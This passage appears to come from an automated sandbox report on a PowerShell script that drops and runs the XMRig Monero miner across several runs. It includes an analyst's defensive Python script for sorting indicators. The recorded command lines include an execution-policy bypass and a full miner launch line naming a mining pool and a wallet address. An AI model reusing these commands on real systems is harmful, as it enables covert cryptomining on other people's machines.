| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 748 wrote to memory of 4464 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 748 wrote to memory of 4464 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (7).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.109.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.109.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 48.229.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 26.173.189.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 240.221.184.93.in-addr.arpa | udp |
Files
memory/748-0-0x00007FF983743000-0x00007FF983744000-memory.dmp
memory/748-5-0x00000279DC890000-0x00000279DC8B2000-memory.dmp
memory/748-6-0x00007FF983740000-0x00007FF98412C000-memory.dmp
memory/748-9-0x00007FF983740000-0x00007FF98412C000-memory.dmp
memory/748-10-0x00000279DCA40000-0x00000279DCAB6000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m4yxep5v.4qu.ps1
| MD5 | c4ca4238a0b923820dcc509a6f75849b |
| SHA1 | 356a192b7913b04c54574d18c28d46e6395428ab |
| SHA256 | 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b |
| SHA512 | 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a |
memory/748-25-0x00007FF983740000-0x00007FF98412C000-memory.dmp
memory/748-48-0x00000279DCBE0000-0x00000279DCBF2000-memory.dmp
memory/748-61-0x00000279DCA20000-0x00000279DCA2A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4464-90-0x0000020C09D30000-0x0000020C09D50000-memory.dmp
memory/4464-91-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/748-92-0x00007FF983743000-0x00007FF983744000-memory.dmp
memory/748-93-0x00007FF983740000-0x00007FF98412C000-memory.dmp
memory/4464-94-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/748-95-0x00007FF983740000-0x00007FF98412C000-memory.dmp
memory/4464-96-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-97-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-98-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-99-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-100-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-101-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-102-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-103-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-104-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-105-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-106-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-107-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-108-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-109-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-110-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-111-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-112-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-113-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-114-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-115-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-116-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-117-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-118-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-119-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-120-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-121-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-122-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-123-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-124-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-125-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-126-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-127-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-128-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-129-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-130-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-131-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-132-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-133-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-134-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-135-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-136-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-137-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-138-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-139-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-140-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-141-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-142-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-143-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-144-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-145-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-146-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-147-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-148-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-149-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-150-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-151-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-152-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-153-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-154-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-155-0x00007FF741210000-0x00007FF741E43000-memory.dmp
memory/4464-156-0x00007FF741210000-0x00007FF741E43000-memory.dmp
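Two things in the Files sections deserve a check before anything is turned into an indicator. First, the `__PSScriptPolicyTest_<random>.ps1` file is written by PowerShell itself on start-up to test whether script execution policy (AppLocker/WDAC) applies; it gets a fresh random name in every run, so it looks like a dropped file but is not attacker-controlled. The hashes listed for it in this run (MD5 `c4ca4238…`, SHA256 `6b86b273…`) are those of a file containing the single byte `1`, which the script below verifies. Second, the long run of `memory/<pid>-<n>-<start>-<end>-memory.dmp` entries are repeated dumps of the same few regions, and the xmrig image region is the same size (0xC33000 bytes) in all three runs, at three different ASLR bases, which agrees with the identical `xmrig.exe` SHA256 across the runs. The following is an added example, not part of the sandbox output: it parses a subset of the entries copied from the report, classifies each path, collapses the dump entries by region and runs the hash check. The classification rules and the one-byte probe check are this example's own.

```python
"""Sort the Files entries into payload, PowerShell probe and memory-dump regions.

Added example, not sandbox output. The paths, regions and hashes are copied
from the Files sections of the three behavioral runs; the classification rules
and the one-byte probe check are this example's own.
"""
from __future__ import annotations

import hashlib
import re
from collections import defaultdict

# A subset of the behavioral22 Files list, copied from the report.
FILES = [
    "memory/748-0-0x00007FF983743000-0x00007FF983744000-memory.dmp",
    "memory/748-6-0x00007FF983740000-0x00007FF98412C000-memory.dmp",
    r"C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m4yxep5v.4qu.ps1",
    r"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe",
    "memory/4464-90-0x0000020C09D30000-0x0000020C09D50000-memory.dmp",
    "memory/4464-91-0x00007FF741210000-0x00007FF741E43000-memory.dmp",
    "memory/4464-94-0x00007FF741210000-0x00007FF741E43000-memory.dmp",
    "memory/4464-156-0x00007FF741210000-0x00007FF741E43000-memory.dmp",
]
# The xmrig.exe image region dumped in each run (xmrig PID -> entry), copied from the report.
XMRIG_IMAGE_REGIONS = {
    920: "memory/920-49-0x00007FF7FC5A0000-0x00007FF7FD1D3000-memory.dmp",    # behavioral23
    4464: "memory/4464-91-0x00007FF741210000-0x00007FF741E43000-memory.dmp",  # behavioral22
    4992: "memory/4992-50-0x00007FF612470000-0x00007FF6130A3000-memory.dmp",  # behavioral31
}
# Hashes the report lists for __PSScriptPolicyTest_m4yxep5v.4qu.ps1 (behavioral22).
PROBE_HASHES = {
    "md5": "c4ca4238a0b923820dcc509a6f75849b",
    "sha1": "356a192b7913b04c54574d18c28d46e6395428ab",
    "sha256": "6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b",
    "sha512": "4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a",
}

_DUMP = re.compile(
    r"^memory/(?P<pid>\d+)-(?P<seq>\d+)-0x(?P<start>[0-9A-Fa-f]+)-0x(?P<end>[0-9A-Fa-f]+)-memory\.dmp$"
)


def parse_dump(name: str) -> dict[str, int] | None:
    """Split a 'memory/<pid>-<seq>-<start>-<end>-memory.dmp' entry into numbers."""
    m = _DUMP.match(name)
    if not m:
        return None
    start, end = int(m["start"], 16), int(m["end"], 16)
    return {"pid": int(m["pid"]), "seq": int(m["seq"]), "start": start, "end": end, "size": end - start}


def classify_file(path: str) -> str:
    if parse_dump(path):
        return "memory_dump"
    name = path.replace("\\", "/").rsplit("/", 1)[-1].lower()
    if name.startswith("__psscriptpolicytest_") and name.endswith((".ps1", ".psm1")):
        return "powershell_policy_probe"  # written by PowerShell itself, not by the sample
    if name == "xmrig.exe":
        return "miner_payload"
    return "other"


def hashes_of(data: bytes) -> dict[str, str]:
    return {"md5": hashlib.md5(data).hexdigest(), "sha1": hashlib.sha1(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest(), "sha512": hashlib.sha512(data).hexdigest()}


def probe_is_single_byte_one() -> bool:
    """True if the listed probe hashes are those of the one-byte file b'1'."""
    return hashes_of(b"1") == PROBE_HASHES


def dump_regions(files) -> dict[tuple[int, int, int], int]:
    """Collapse repeated dumps of one (pid, start, end) region into a count."""
    regions: dict[tuple[int, int, int], int] = defaultdict(int)
    for f in files:
        d = parse_dump(f)
        if d:
            regions[(d["pid"], d["start"], d["end"])] += 1
    return dict(regions)


def xmrig_image_sizes() -> set[int]:
    """Mapped size of the xmrig image per run; a single value means one binary at three ASLR bases."""
    return {parse_dump(r)["size"] for r in XMRIG_IMAGE_REGIONS.values()}


if __name__ == "__main__":
    print("probe is b'1':", probe_is_single_byte_one())
    for f in FILES:
        print(f"{classify_file(f):24} {f}")
    for (pid, start, end), n in dump_regions(FILES).items():
        print(f"pid {pid} {start:#x}-{end:#x} size {end - start:#x} dumped {n}x")
    print("xmrig image sizes:", {f"{s:#x}" for s in xmrig_image_sizes()})
```

The practical consequence: the probe file's name and hashes must not go into a blocklist (every PowerShell host produces them), and the artifact that does belong there is `xmrig.exe` with SHA256 `2025f4fe…c90fda`, which the report lists identically for all three runs.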
Analysis: behavioral31
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 17:27
Platform
win10v2004-20240426-en
Max time kernel
1794s
Max time network
1757s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| 64 hits; the report records no description, indicator, process or target for any of them | N/A | N/A | N/A |
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 3052 wrote to memory of 4992 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 3052 wrote to memory of 4992 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (9).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 23.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 204.79.197.237:443 | g.bing.com | tcp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 237.197.79.204.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 97.61.62.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 205.47.74.20.in-addr.arpa | udp |
| NL | 23.62.61.97:443 | www.bing.com | tcp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | rx.unmineable.com | udp |
| GB | 161.35.34.195:443 | rx.unmineable.com | tcp |
| US | 8.8.8.8:53 | 195.34.35.161.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 13.227.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 144.107.17.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 66.112.168.52.in-addr.arpa | udp |
Files
memory/3052-0-0x00007FFFE3423000-0x00007FFFE3425000-memory.dmp
memory/3052-6-0x0000018AF62D0000-0x0000018AF62F2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qdbcmn1d.gyi.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/3052-11-0x00007FFFE3420000-0x00007FFFE3EE1000-memory.dmp
memory/3052-12-0x00007FFFE3420000-0x00007FFFE3EE1000-memory.dmp
memory/3052-14-0x00007FFFE3420000-0x00007FFFE3EE1000-memory.dmp
memory/3052-15-0x0000018AF62A0000-0x0000018AF62B2000-memory.dmp
memory/3052-16-0x0000018AF3850000-0x0000018AF385A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
| MD5 | 205ad9eb6acd6f58752899669b69fe74 |
| SHA1 | bedb78ac5034259b86c2cbc915de2e861e8d7604 |
| SHA256 | 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda |
| SHA512 | 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3 |
memory/4992-47-0x0000027E80F90000-0x0000027E80FB0000-memory.dmp
memory/4992-48-0x0000027E811E0000-0x0000027E81200000-memory.dmp
memory/3052-49-0x00007FFFE3420000-0x00007FFFE3EE1000-memory.dmp
memory/3052-51-0x00007FFFE3423000-0x00007FFFE3425000-memory.dmp
memory/4992-50-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/3052-52-0x00007FFFE3420000-0x00007FFFE3EE1000-memory.dmp
memory/4992-54-0x0000027E829C0000-0x0000027E829E0000-memory.dmp
memory/4992-55-0x0000027E829E0000-0x0000027E82A00000-memory.dmp
memory/4992-53-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/3052-56-0x00007FFFE3420000-0x00007FFFE3EE1000-memory.dmp
memory/4992-57-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-58-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-59-0x0000027E829C0000-0x0000027E829E0000-memory.dmp
memory/4992-60-0x0000027E829E0000-0x0000027E82A00000-memory.dmp
memory/4992-61-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-62-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-63-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-64-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-65-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-66-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-67-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-68-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-69-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-70-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-71-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-72-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-73-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-74-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-75-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-76-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-77-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-78-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-79-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-80-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-81-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-82-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-83-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-84-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-85-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-86-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-87-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-88-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-89-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-90-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-91-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-92-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-93-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-94-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-95-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-96-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-97-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-98-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-99-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-100-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-101-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-102-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-103-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-104-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-105-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-106-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-107-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-108-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-109-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-110-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-111-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-112-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-113-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-114-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-115-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-116-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-117-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-118-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
memory/4992-119-0x00007FF612470000-0x00007FF6130A3000-memory.dmp
Analysis: behavioral3
Detonation Overview
Submitted
2024-05-25 15:43
Reported
2024-05-25 16:55
Platform
win10v2004-20240426-en
Max time kernel
1792s
Max time network
1764s
Command Line
Signatures
XMRig Miner payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |

(64 identical rows; the signature fired 64 times with no description, indicator, process or target recorded.)
xmrig
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
| Token: SeLockMemoryPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4104 wrote to memory of 4504 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
| PID 4104 wrote to memory of 4504 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe |
Processes
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (2).ps1"
C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe
"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | objects.githubusercontent.com | udp |
| US | 185.199.108.133:443 | objects.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.107.17.2.in-addr.arpa | udp |
